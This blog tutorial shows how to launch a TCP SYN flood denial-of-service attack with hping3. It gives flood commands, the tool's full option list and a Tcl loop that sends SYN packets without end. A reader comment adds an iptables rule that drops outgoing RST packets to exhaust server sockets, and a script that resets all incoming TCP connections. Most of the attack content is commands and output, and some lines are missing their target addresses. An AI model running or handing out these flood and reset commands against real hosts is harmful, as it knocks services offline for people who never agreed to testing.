TCP SYN flood DOS attack with hping

By | November 24, 2012


Wikipedia defines hping as :

hping is a free packet generator and analyzer for the TCP/IP protocol distributed by Salvatore Sanfilippo (also known as Antirez). Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

On ubuntu hping can be installed from synaptic manager.

$ sudo apt-get install hping3

Syn flood

To send syn packets use the following command at terminal

$ sudo hping3 -i u1 -S -p 80

The above command would send TCP SYN packets to
sudo is necessary since the hping3 create raw packets for the task , for raw sockets/packets root privilege is necessary on Linux.

S - indicates SYN flag
p 80 - Target port 80
i u1 - Wait for 1 micro second between each packet

More options

Sending N number of packets :

c - indicates the number of packets to send/receive

$ sudo hping3 -i u1 -S -p 80 -c 10 
HPING (eth0 S set, 40 headers + 0 data bytes

--- hping statistic ---
10 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

Other options from help :

[shell css_class="small_code"]
$ hping3 -help
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S
-9 --listen listen mode
-a --spoof spoof source address
--rand-dest random destionation address mode. see the man.
--rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set don't fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
-s --baseport base source port (default random)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-mss enable the TCP MSS option with the given value
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)

Packet crafting with hping

AS of version 3 hping now is scriptable using Tcl language and also has a shell for interactive commands.
To send SYN packets :

$ sudo hping3
hping3> while {1} { hping send "ip(saddr=,daddr=,dport=80,flags=s)" }
[2]+  Stopped                 sudo hping3

The above method allows for easier human readable packet crafting. Use Wireshark to detect and analyse the packets send.

You can also code your own syn flood program in C, python or perl. It requires knowledge of socket programming.

Last Updated On : 24th November 2012

3 thoughts on “TCP SYN flood DOS attack with hping

  1. Halil


    This is a SYN attack, in the same way, that every car is a race car.

    You send a SYN, and get a SYN/ACK back. However its a build in mechanism that you send a RESET back for the other side to close the socket.
    So what you will accomplish is just a lot of incomplete 3-way handshake, which WE stop after the second handshake. and the server closes the socket…..

    The command used is correct indeed,
    sudo hping3 -i u1 -S -p 80

    However I would always use a -c with the -I u1 option as you don’t want your server to become unreachable and stay that way.
    And, to make it a real SYN attack, drop egressing RST packets in iptables.
    This causes the server to keep the sockets open and you can exhaust the sockets on the server side.
    a real SYN attack is done as following:

    iptables -A OUTPUT -p tcp -m tcp –tcp-flags RST RST -j DROP
    sudo hping3 -i u1 -s ++0 -S -p 80 -c 65000

    Don’t forget to remove the iptables rule afterwards, or even better, add the destination to drop RSTs, otherwise, all RSTs are dropped.

    I just love hping3,
    and the TCL capability.

    for example, reset all tcp connections coming in :
    while 1 {
    set p [lindex [hping recv eth0] 0]
    hping3 “-R” “-a” “[hping getfield ip daddr $p]” “-c” “1” “-p” “[hping getfield tcp sport $p]” “[hping getfield ip saddr $p]”

    And the nice reply , where the remote is Acknowledging our RESET of the socket :)
    nice network “virus”, which doesn’t let connections to be made :)

    HPING x.x.x.x (br0 x.x.x.x): R set, 40 headers + 0 data bytes
    len=46 ip=x.x.x.x ttl=117 DF id=25736 sport=61012 flags=A seq=0 win=9469 rtt=0.0 ms

    — x.x.x.x hping statistic —
    1 packets transmitted, 1 packets received, 0% packet loss
    round-trip min/avg/max = 0.0/0.0/0.0 ms

    Have a nice (packet) crafting life :)

Leave a Reply

Your email address will not be published. Required fields are marked *